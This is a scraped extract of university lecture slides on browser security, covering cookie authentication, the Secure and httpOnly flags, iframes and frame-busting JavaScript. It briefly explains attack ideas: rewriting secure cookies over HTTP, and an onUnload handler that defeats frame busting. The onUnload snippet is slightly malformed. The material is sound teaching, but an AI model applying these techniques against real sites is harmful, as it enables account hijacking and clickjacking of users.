![Page 67: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/67.jpg)
Cookie authentication Browser Web Server Auth server
POST login.cgi Username & pwd Validate user
auth=val Store val
Set-cookie: auth=val
GET restricted.html Cookie: auth=val restricted.html
auth=val
YES/NO If YES, restricted.html
Check val
![Page 68: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/68.jpg)
Cookie Security Policy Uses: n User authentication n Personalization n User tracking: e.g. Doubleclick (3rd party cookies)
Browser will store: n At most 20 cookies/site, 3 KB / cookie
Origin is the tuple <domain, path> n Can set cookies valid across a domain suffix
![Page 69: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/69.jpg)
Secure Cookies
Browser Server
GET …
HTTP Header: Set-cookie: NAME=VALUE ;
Secure=true
• Provides confidentiality against network attacker • Browser will only send cookie back over HTTPS
• … but no integrity • Can rewrite secure cookies over HTTP
⇒ network attacker can rewrite secure cookies ⇒ can log user into attacker’s account
![Page 70: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/70.jpg)
httpOnly Cookies
Browser Server
GET …
HTTP Header: Set-cookie: NAME=VALUE ;
httpOnly
• Cookie sent over HTTP(s), but not accessible to scripts
• cannot be read via document.cookie
• Helps prevent cookie theft via XSS
… but does not stop most other risks of XSS bugs
![Page 71: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/71.jpg)
FRAMES AND FRAME BUSTING
![Page 72: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/72.jpg)
<iframe name=“myframe” src=“http://www.google.com/”>
This text is ignored by most browsers. </iframe>
Frames
Embed HTML documents in other documents
![Page 73: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/73.jpg)
Frame Busting
Goal: prevent web page from loading in a frame n example: opening login page in a frame will display
correct passmark image
Frame busting:
if (top != self) top.location.href = location.href
![Page 74: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/74.jpg)
Better Frame Busting
Problem: Javascript OnUnload event
Try this instead:
<body onUnload="javascript: cause_an_abort;)">
if (top != self) top.location.href = location.href
else { … code of page here …}
![Page 75: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/75.jpg)
Summary
Http Rendering content Isolation Communication Navigation Security User Interface Cookies Frames and frame busting